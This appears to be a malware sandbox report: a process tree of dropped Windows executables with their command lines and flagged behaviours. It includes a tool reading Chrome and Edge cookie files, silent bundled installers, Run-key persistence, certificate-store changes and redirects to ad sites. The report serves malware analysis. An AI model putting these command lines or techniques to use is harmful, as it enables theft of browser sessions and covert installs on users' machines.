[3] C:\Users\Admin\Documents\2D6KXJ4Sih2rnKqehqnnaTsh.exe
    Command line: "C:\Users\Admin\Documents\2D6KXJ4Sih2rnKqehqnnaTsh.exe"
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx

[4] C:\Program Files (x86)\Company\NewProduct\jooyu.exe
    Command line: "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    - Executes dropped EXE

[5] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[4] C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    Command line: "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    - Executes dropped EXE

[4] C:\Program Files (x86)\Company\NewProduct\customer3.exe
    Command line: "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[5] C:\Users\Admin\AppData\Local\Temp\11111.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
[3] C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe
    Command line: "C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe
    Command line: C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe

[3] C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe
    Command line: "C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[3] C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe
    Command line: "C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe"
    - Executes dropped EXE

[3] C:\Users\Admin\Documents\2u55W290oBvJVcrb8gcaR3aD.exe
    Command line: "C:\Users\Admin\Documents\2u55W290oBvJVcrb8gcaR3aD.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[4] C:\Users\Admin\AppData\Roaming\8259576.exe
    Command line: "C:\Users\Admin\AppData\Roaming\8259576.exe"
    - Executes dropped EXE
    - Adds Run key to start application

[5] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    Command line: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    - Executes dropped EXE

[4] C:\Users\Admin\AppData\Roaming\6609898.exe
    Command line: "C:\Users\Admin\AppData\Roaming\6609898.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[5] C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -u -p 3712 -s 2296
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[3] C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe
    Command line: "C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe
    Command line: C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe

[3] C:\Users\Admin\Documents\HigBkRPx0qyWn99cHptOkbti.exe
    Command line: "C:\Users\Admin\Documents\HigBkRPx0qyWn99cHptOkbti.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 316
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[3] C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe
    Command line: "C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Users\Admin\Documents\Y7aLf8zJ97XcPikNEtC8S9tn.exe
    Command line: "C:\Users\Admin\Documents\Y7aLf8zJ97XcPikNEtC8S9tn.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[3] C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe
    Command line: "C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe"
    - Executes dropped EXE

[4] C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe
    Command line: C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe
    - Executes dropped EXE

[3] C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe
    Command line: "C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Users\Admin\Documents\WNJCVPrW3aAcLvQSoBp1SYrf.exe
    Command line: "C:\Users\Admin\Documents\WNJCVPrW3aAcLvQSoBp1SYrf.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[3] C:\Users\Admin\Documents\ZH_D8d_woMBuwaliVLK7dXsO.exe
    Command line: "C:\Users\Admin\Documents\ZH_D8d_woMBuwaliVLK7dXsO.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 276
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[3] C:\Users\Admin\Documents\YqIXiCL33maLAy2OB92ojfwd.exe
    Command line: "C:\Users\Admin\Documents\YqIXiCL33maLAy2OB92ojfwd.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Users\Admin\AppData\Local\Temp\is-IHMEQ.tmp\YqIXiCL33maLAy2OB92ojfwd.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-IHMEQ.tmp\YqIXiCL33maLAy2OB92ojfwd.tmp" /SL5="$20284,138429,56832,C:\Users\Admin\Documents\YqIXiCL33maLAy2OB92ojfwd.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
[5] C:\Users\Admin\AppData\Local\Temp\is-F8N6E.tmp\Setup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-F8N6E.tmp\Setup.exe" /Verysilent

[6] C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[7] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 228
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[6] C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Suspicious use of FindShellTrayWindow

[7] C:\Windows\SysWOW64\msiexec.exe
    Command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"

[6] C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[7] C:\Users\Admin\AppData\Local\Temp\is-FGPPS.tmp\WEATHER Manager.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-FGPPS.tmp\WEATHER Manager.tmp" /SL5="$40240,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent

[8] C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\Setup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
    - Loads dropped DLL
    - Enumerates connected drives
    - Modifies system certificate store
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx

[9] C:\Windows\SysWOW64\msiexec.exe
    Command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"

[6] C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[6] C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[7] C:\Users\Admin\AppData\Local\Temp\is-2LTVG.tmp\VPN.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-2LTVG.tmp\VPN.tmp" /SL5="$402FE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx

[8] C:\Users\Admin\AppData\Local\Temp\is-857PD.tmp\Setup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-857PD.tmp\Setup.exe" /silent /subid=720
    - Suspicious use of SetWindowsHookEx

[9] C:\Users\Admin\AppData\Local\Temp\is-2QFEV.tmp\Setup.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-2QFEV.tmp\Setup.tmp" /SL5="$104C2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-857PD.tmp\Setup.exe" /silent /subid=720
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx

[10] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "

[11] C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    Command line: tapinstall.exe remove tap0901

[10] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "

[11] C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    Command line: tapinstall.exe install OemVista.inf tap0901

[10] C:\Program Files (x86)\MaskVPN\mask_svc.exe
    Command line: "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall

[10] C:\Program Files (x86)\MaskVPN\mask_svc.exe
    Command line: "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install

[6] C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx

[7] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1764
    - Program crash

[6] C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
    Command line: "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[7] C:\Users\Admin\AppData\Local\Temp\is-CDSIJ.tmp\MediaBurner2.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-CDSIJ.tmp\MediaBurner2.tmp" /SL5="$103E8,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx

[8] C:\Users\Admin\AppData\Local\Temp\is-OPF6A.tmp\3377047_logo_media.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-OPF6A.tmp\3377047_logo_media.exe" /S /UID=burnerch2
    - Drops file in Drivers directory
    - Executes dropped EXE

[9] C:\Program Files\Windows Defender Advanced Threat Protection\FJGGDEFOYM\ultramediaburner.exe
    Command line: "C:\Program Files\Windows Defender Advanced Threat Protection\FJGGDEFOYM\ultramediaburner.exe" /VERYSILENT

[10] C:\Users\Admin\AppData\Local\Temp\is-D90VE.tmp\ultramediaburner.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-D90VE.tmp\ultramediaburner.tmp" /SL5="$30534,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\FJGGDEFOYM\ultramediaburner.exe" /VERYSILENT

[11] C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
    Command line: "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

[9] C:\Users\Admin\AppData\Local\Temp\f7-3a4aa-df3-f0589-27e62070f3d91\SHubolekyda.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\f7-3a4aa-df3-f0589-27e62070f3d91\SHubolekyda.exe"

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718

[10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231

[11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc4718
